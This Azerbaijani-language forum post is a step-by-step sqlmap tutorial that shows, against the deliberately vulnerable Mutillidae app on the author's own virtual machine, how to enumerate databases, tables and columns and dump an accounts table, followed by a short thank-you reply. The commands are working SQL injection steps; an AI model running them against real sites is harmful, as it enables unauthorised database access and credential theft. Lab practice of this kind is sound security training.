SQLMAP-sql injection tool

13rose

VIP
İsmarıclar
16
Reaksiya xalı
12
Qoşuldu
27 Avq 2023
  1 illik istifadəçi
Salam bugün SQLMAP istifadə edərək SQL injection edərək məlumatları necə əldə edəcəyimizi göstərəcəm

1.SQL açığı olan web saytı tapın
məs: http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details
(bu mənim virtualbox"da test məqsədli cihazımdır sizdə bu url işləməyəcək.)

KOD: sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -dbs
NƏTİCƏ:

1693763532181.png

1693763585820.png
2.Gördüyünüz kimi bir çox database var.Mövcud işlətdiyimiz database isə --current-db ilə tapacayıq
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --current-db
NƏTİCƏ:
1693763697475.png

3.Burdan mövcud işlətdiyimiz database owasp10 görsənir indi bunun tabloların əldə edə -tables kodu ilə
KOD:
sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -tables -D owasp10
NƏTİCƏ:
1693763833738.png

4.İstədiymiz tablonu seçirik mən accounts seçdim.Kolumn adlarını sütun adların öyrənək əslində belədə vacib deyil dump deyib birbaşa əldə bilərik.Onuda göstərəcəm.
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" --colum -T accounts -D owasp10
NƏTİCƏ:

1693764173371.png

5.Bu tablodakı bütün məlumatları əldə edək kod dump
KOD:sqlmap -u "http://10.0.2.7/mutillidae/index.ph...r-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump
NƏTİCƏ:
1693764263317.png

Gördüyünüz kimi SQLİ istifadə edərək database hacklədik.
(P.S:Bu mənim test üçün açdığım cihaz idi url sizdə işləməyəckdir.)
Faydalı oldusa bəyənin daha çoxu gəlsin sqlmap mövzusunda.

TƏŞƏKKÜRLƏR
 

F-19

VIP
İsmarıclar
63
Reaksiya xalı
53
Qoşuldu
7 Avq 2023
Yaş
24
  1 illik istifadəçi
Məkan
Baku
Əlinə sağlıq, yararlı mövzudur.
 
Göndərilən Alt